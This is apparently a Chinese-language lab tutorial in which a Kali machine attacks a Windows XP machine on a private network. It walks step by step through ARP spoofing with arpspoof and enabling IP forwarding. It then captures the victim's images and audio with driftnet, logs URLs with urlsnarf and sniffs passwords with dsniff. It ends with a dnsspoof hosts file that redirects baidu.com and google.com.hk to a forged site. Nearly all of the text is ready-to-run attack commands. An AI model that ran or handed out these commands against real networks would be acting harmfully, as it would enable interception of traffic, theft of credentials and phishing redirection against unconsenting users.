准備:kali、xp
kali ip:192.168.14.157
目標ip:192.168.14.158
目標網關:192.168.14.2
ARP欺騙:
arpspoof -t 目標ip -r 目標網關
命令:arpspoof -i eth0 -t 192.168.14.158 -r 192.168.14.2
我們可以看到xp認為網關的MAC地址和KAli是一樣的
顯示我們欺騙成功
但現在xp是不能上網的
kali 默認不會開啟流量轉發
我們在xp下是不能上網的
打開流量轉發的功能:
查看(默認kali沒有開啟流量轉發功能,值為0)
命令:cat /proc/sys/net/ipv4/ip_forward
默認值為0
開啟流量轉發
命令:echo 1 > /proc/sys/net/ipv4/ip_forward
我們回來看kali是否能上網
能上網
網絡嗅探
竊取瀏覽中的圖片:
命令:driftnet -i eth0
會打開一個窗口
我們去xp瀏覽網站
再看看效果
可以看到瀏覽過的網頁照片都在這里顯示
還可以抓取聲音文件
你也可以把圖片放到一起,放到一個目錄下
新建目錄:
mkdir 目錄名
-例如 mkdir tempdir/
把抓的圖片保存到目錄:
-driftnet -i eth0 -a -d tempdir/ -s(聲音文件)
抓傳輸過程瀏覽的url:
命令:urlsnarf -i eth0
嗅探密碼:
命令:dsniff -i eth0 -m
DNS欺騙(域名劫持)
你也可以進行域名劫持,讓對方訪問一個網站解析到不准確或者偽造的網站上
你需要自己配制欺騙的域名
本人沒有找到自帶的域名集
只能自己編輯
格式:
偽造網站ip *.baidu.com
偽造網站ip *.google.com.hk
查看:cat /usr/share/dsniff/dnsspoof.hosts
編輯:vi /usr/share/dsniff/dnsspoof.hosts
執行命令:dnsspoof -i eth0 -f /usr/share/dsniff/dnsspoof.hosts